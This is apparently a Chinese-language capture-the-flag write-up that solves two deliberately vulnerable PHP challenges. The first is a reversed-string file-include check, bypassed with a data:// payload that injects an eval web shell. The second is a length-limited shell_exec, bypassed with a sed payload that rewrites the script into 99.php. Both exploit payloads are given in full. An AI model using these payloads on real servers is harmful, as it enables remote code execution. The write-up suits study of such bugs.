pass-01 web签到

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: [email protected]
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$file = $_POST['file'];

if(isset($file)){
    if(strrev($file)==$file){
        include $file;
    }

}

看到入参file 判断项是 strrev(反转)==正常入参

刚开始考虑过弱等于绕过，但是include没啥用，

后来了解到  2个知识点，，

1.第一可以利用 data://伪协议，

2.php ?>后的内容不再进行运算

所以可以构造如下：

file=data://text/plain,<?php eval($_REQUEST[1]);?>

通过py反转构造完整payload

 签到题这么难？签到题不应该是有手就行的那种吗。

 PASS-02 easyPHP

<?php

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-03-19 12:10:55
# @Last Modified by:   h1xa
# @Last Modified time: 2022-03-19 13:27:18
# @email: [email protected]
# @link: https://ctfer.com

error_reporting(0);
highlight_file(__FILE__);

$cmd = $_POST['cmd'];
$param = $_POST['param'];

if(isset($cmd) && isset($param)){
    $cmd=escapeshellcmd(substr($cmd,0,3))." ".escapeshellarg($param)." ".__FILE__;
    shell_exec($cmd);
}

escapeshell用来做过滤，限制了字符串长度为3，

根据大牛提示经验 需要使用sed命令新建文件，用sed匹配参数正则来进行替换修改

sed 正则表达式 - sed 基础教程 - 简单教程，简单编程

先需要使用参数：

1. “/escap/d”   其中的d为的是删除 escap整行的限制

2.使用参数“s/shell_exec/system/g” 这里的s目的是替换 g 参数目的是为了全局，

完整payload=“cmd=sed&param=/escapeshell/d;s/shell_exec/system/g;w 99.php”